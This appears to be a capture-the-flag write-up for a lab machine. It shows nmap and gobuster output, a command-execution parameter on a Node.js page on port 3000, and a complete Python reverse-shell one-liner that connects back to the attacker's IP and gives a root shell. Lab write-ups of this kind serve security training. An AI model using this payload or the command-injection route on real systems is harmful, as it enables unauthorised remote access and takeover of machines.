mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-26 05:40:16 +00:00
127 lines
No EOL
8.8 KiB
Markdown
127 lines
No EOL
8.8 KiB
Markdown
## NMAP
|
|
```
|
|
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 14:50 EDT
|
|
Nmap scan report for 10.10.25.95
|
|
Host is up (0.18s latency).
|
|
Not shown: 995 closed ports
|
|
PORT STATE SERVICE VERSION
|
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
|
|
| ssh-hostkey:
|
|
| 2048 1d:f0:d5:f2:67:1e:55:99:de:c6:26:85:b3:86:ea:81 (RSA)
|
|
| 256 4f:5f:62:98:aa:b1:dd:a2:81:61:16:9b:a5:29:cd:bd (ECDSA)
|
|
|_ 256 9b:12:b0:f3:1f:fb:b7:d8:a8:9c:6b:e6:bd:f4:40:55 (ED25519)
|
|
23/tcp open telnet Linux telnetd
|
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
|
|_http-title: Michael Jordan
|
|
3000/tcp open http Node.js (Express middleware)
|
|
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|
|
9999/tcp open http Golang net/http server
|
|
| fingerprint-strings:
|
|
| FourOhFourRequest:
|
|
| HTTP/1.0 200 OK
|
|
| Date: Sun, 20 Sep 2020 18:50:24 GMT
|
|
| Content-Length: 1
|
|
| Content-Type: text/plain; charset=utf-8
|
|
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
|
|
| HTTP/1.1 400 Bad Request
|
|
| Content-Type: text/plain
|
|
| Connection: close
|
|
| Request
|
|
| GetRequest, HTTPOptions:
|
|
| HTTP/1.0 200 OK
|
|
| Date: Sun, 20 Sep 2020 18:50:23 GMT
|
|
| Content-Length: 1
|
|
| Content-Type: text/plain; charset=utf-8
|
|
| OfficeScan:
|
|
| HTTP/1.1 400 Bad Request
|
|
| Content-Type: text/plain
|
|
| Connection: close
|
|
|_ Request: missing required Host header
|
|
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|
|
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
|
|
submit.cgi?new-service :
|
|
SF-Port9999-TCP:V=7.80%I=7%D=9/20%Time=5F67A46F%P=x86_64-pc-linux-gnu%r(Ge
|
|
SF:tRequest,75,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sun,\x2020\x20Sep\x2020
|
|
SF:20\x2018:50:23\x20GMT\r\nContent-Length:\x201\r\nContent-Type:\x20text/
|
|
SF:plain;\x20charset=utf-8\r\n\r\n\n")%r(HTTPOptions,75,"HTTP/1\.0\x20200\
|
|
SF:x20OK\r\nDate:\x20Sun,\x2020\x20Sep\x202020\x2018:50:23\x20GMT\r\nConte
|
|
SF:nt-Length:\x201\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\
|
|
SF:n\n")%r(FourOhFourRequest,75,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sun,\x
|
|
SF:2020\x20Sep\x202020\x2018:50:24\x20GMT\r\nContent-Length:\x201\r\nConte
|
|
SF:nt-Type:\x20text/plain;\x20charset=utf-8\r\n\r\n\n")%r(GenericLines,58,
|
|
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain\r\nC
|
|
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(RTSPRequest,58,"HT
|
|
SF:TP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain\r\nConn
|
|
SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,58,"HTTP/1\.1\x2
|
|
SF:0400\x20Bad\x20Request\r\nContent-Type:\x20text/plain\r\nConnection:\x2
|
|
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,58,"HTTP/1\.1\x20
|
|
SF:400\x20Bad\x20Request\r\nContent-Type:\x20text/plain\r\nConnection:\x20
|
|
SF:close\r\n\r\n400\x20Bad\x20Request")%r(LPDString,58,"HTTP/1\.1\x20400\x
|
|
SF:20Bad\x20Request\r\nContent-Type:\x20text/plain\r\nConnection:\x20close
|
|
SF:\r\n\r\n400\x20Bad\x20Request")%r(SIPOptions,58,"HTTP/1\.1\x20400\x20Ba
|
|
SF:d\x20Request\r\nContent-Type:\x20text/plain\r\nConnection:\x20close\r\n
|
|
SF:\r\n400\x20Bad\x20Request")%r(Socks5,58,"HTTP/1\.1\x20400\x20Bad\x20Req
|
|
SF:uest\r\nContent-Type:\x20text/plain\r\nConnection:\x20close\r\n\r\n400\
|
|
SF:x20Bad\x20Request")%r(OfficeScan,76,"HTTP/1\.1\x20400\x20Bad\x20Request
|
|
SF:\r\nContent-Type:\x20text/plain\r\nConnection:\x20close\r\n\r\n400\x20B
|
|
SF:ad\x20Request:\x20missing\x20required\x20Host\x20header");
|
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
|
|
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
|
Nmap done: 1 IP address (1 host up) scanned in 49.58 seconds
|
|
|
|
```
|
|
|
|
## Gobuster
|
|
|
|
```
|
|
gobuster dir -u http://10.10.25.95 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
===============================================================
|
|
Gobuster v3.0.1
|
|
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
|
===============================================================
|
|
[+] Url: http://10.10.25.95
|
|
[+] Threads: 10
|
|
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
[+] Status codes: 200,204,301,302,307,401,403
|
|
[+] User Agent: gobuster/3.0.1
|
|
[+] Timeout: 10s
|
|
===============================================================
|
|
2020/09/20 14:50:41 Starting gobuster
|
|
===============================================================
|
|
/images (Status: 301)
|
|
/img (Status: 301)
|
|
/mail (Status: 301)
|
|
/scripts (Status: 301)
|
|
/local (Status: 301)
|
|
/css (Status: 301)
|
|
/test (Status: 301)
|
|
/install (Status: 301)
|
|
/js (Status: 301)
|
|
/javascript (Status: 301)
|
|
/vendor (Status: 301)
|
|
/flag (Status: 301)
|
|
/LICENSE (Status: 200)
|
|
|
|
```
|
|
|
|
## PORT 80
|
|
|
|
There wasn't anything interesting on PORT 80
|
|
|
|
## PORT 30000
|
|
|
|
There was remote code execution on that page `10.10.25.95:3000?cmd=ls` which will give us an output.
|
|
|
|
## Reverse Shell
|
|
|
|
For reverse shell only python payload was working.
|
|
|
|
```
|
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.94.60",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
|
```
|
|
|
|
## Privilege Escalation
|
|
|
|
There was no need to escalate our privileges we were already a root user through this reverse shell. |